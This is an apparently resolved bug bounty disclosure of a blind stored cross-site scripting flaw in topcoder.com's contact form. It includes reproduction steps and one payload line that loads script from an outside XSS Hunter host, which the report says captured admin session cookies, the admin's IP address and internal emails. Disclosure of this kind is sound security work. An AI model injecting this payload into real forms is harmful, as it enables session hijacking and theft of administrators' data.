Blind stored XSS due to insecure contact form at https://www.topcoder.com leads to leakage of session token and other PII
High
L
Lab45
Submitted None
Actions:
Reported by
mase289
Vulnerability Details
Technical details and impact analysis
## Summary:
I have discovered a blind stored cross site scripting vulnerability due to an insecure Contact form available here https://www.topcoder.com/contact-us/ This form does not properly sanitize user input allowing for the insertion and submission of dangerous characters such as angle brackets. I was able to submit a blind xss payload through the form which was triggered in backend /admin panel.
## Steps To Reproduce:
[add details for how we can reproduce the issue]
1. Browse to the page at https://www.topcoder.com/contact-us/ and fill out the contact form submitting your blind XSS payload in First name , Last name, Company and description field.
2. Submit the form and have and admin access the information.
3. This will trigger XSS in the admin panel and a notification to the XSS hunter service with details of the event.
## Supporting Material/References:
[list any additional material (e.g. screenshots, logs, etc.)]
* [attachment / reference]
F834746 XSS hunter screenshot revealing mail chimp information
█████ Dom.html you can search through this for my XSS hunter payload `"><script src=https://xvt.xss.ht></script>`
F834748 Full XSS hunter email report
## Impact
An attacker is able to access critical information from the admin panel. The XSS reveals the administrator’s IP address, backend application service, titles of mail chimp customer and internal subscription emails, admin session cookies.
An attacker can exploit the above cookies to access the admin panel.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Stored